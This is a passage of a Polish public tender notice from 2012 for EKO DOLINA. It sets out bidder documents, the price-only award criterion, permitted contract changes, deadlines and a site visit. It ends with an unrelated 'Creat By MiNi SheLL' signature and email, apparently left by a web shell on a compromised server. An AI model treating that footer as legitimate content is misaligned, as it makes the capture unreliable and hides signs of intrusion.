Zamawiający sprawdzi prawidłowość złożonych dokumentów i zgodność z wyżej wymienionymi, jako wymaganymi do wzięcia udziału w przetargu. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia-nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy odbywać się będą zgodnie z zapisem art. 144 ustawy Prawo zamówień publicznych  z dnia 29 stycznia 2004r. i wymagają dla swojej ważności zachowania formy pisemnej. Są one możliwe w przypadku:
1)	wydłużenia terminu realizacji umowy, w związku z niemożliwością realizacji jej przedmiotu w zakładanym terminie, w przypadku okoliczności niezależnych od zachowania Stron lub nieznanych Stronom umowy w chwili jej zawarcia, takich jak: wynikające  z wad opisu przedmiotu zamówienia ujawnionych dopiero po rozpoczęciu  wykonywania umowy, spowodowane wystąpieniem niezinwentaryzowanych, ukrytych obiektów budowlanych, przeszkód geologicznych oraz innych przeszkód utrudniających lub uniemożliwiających prowadzenie usługi w zgodzie z opisem zamówienia, zasadami wiedzy technicznej i właściwymi przepisami, wynikające z postępu technicznego umożliwiającego zastosowanie nowych rozwiązań technicznych i technologicznych.
2)	wystąpienia siły wyższej tj. zdarzenia to jest wyjątkowego wydarzenia lub okoliczności na którą Strona nie ma wpływu, w tym w szczególności:
a)	opóźnienia spowodowane przez organy administracji publicznej,
b)	akty terroryzmu,
c)	zamieszki, rozruchy, niepokoje, strajki lub lokaut z udziałem osób innych niż personel Wykonawcy lub inni pracownicy Wykonawcy,
d)	amunicję wojskową, materiały wybuchowe, promieniowanie jonizujące lub skażenie radioaktywne, z wyłączeniem takich, które mogą być uznane za spowodowane przez używanie amunicji, materiałów wybuchowych, materiałów radioaktywnych lub promieniowania przez wykonawcę, oraz
e)	katastrofy żywiołowe, m.in. takie, jak; trzęsienia ziemi, huragany, tajfuny lub długotrwałe ulewy, opady śniegu
3)	zmiany ceny  wymienionej w § 7 ust.1 w zakresie zmiany stawki  podatku od towarów i usług [VAT] będącej skutkiem zmiany przepisów powszechnie obowiązujących na terytorium Rzeczpospolitej Polskiej  w zakresie mającym zastosowanie  do przedmiotu umowy o  wartość zmienionego w ten sposób podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ekodolina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.ekodolina.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2012 godzina 14:00, miejsce: Łężyce, Aleja Parku Krajobrazowego 99
84-207 Koleczkowo 
lub osobiście: w budynku administracyjnym - sekretariat Zarządu (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wizja lokalna zostanie zorganizowana przez Zamawiającego w dniu 29.03.2012r. o godz. 12.00 czasu lokalnego. 
Wizja lokalna obejmie teren EKO DOLINY Sp. z o. o. i jej otoczenia w celu oszacowania przez Wykonawców, na ich własną odpowiedzialność, koszt i ryzyko, wszelkich danych, jakie mogą okazać się niezbędne do przygotowania oferty i podpisania wynikającego z niej Umowy.
Wizja lokalna odbędzie się w  siedzibie Zamawiającego, tj. EKO DOLINA Sp. z o. o., Łężyce, Al. Parku Krajobrazowego 99, PL 84-207 Koleczkowo. 
Osobą odpowiedzialną za zorganizowanie wizji lokalnej jest p. Karol Mazurkiewicz tel. (48 58) 672 50 00; fax. nr (+48 58) 672 74 74.
Podczas wizji lokalnej nie będą przyjmowane żadne zapytania ani udzielane żadne wyjaśnienia dotyczące treści Specyfikacji istotnych warunków zamówienia. Zapytania takie należy kierować do Zamawiającego zgodnie z zapisami p. IX  SIWZ.
Jakiekolwiek koszty związane z wizją lokalną Terenu wykonywania umowy ponosi Wykonawca.
Zamawiający nie będzie organizował zebrania wszystkich Wykonawców w celu wyjaśnienia wątpliwości dotyczących treści Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com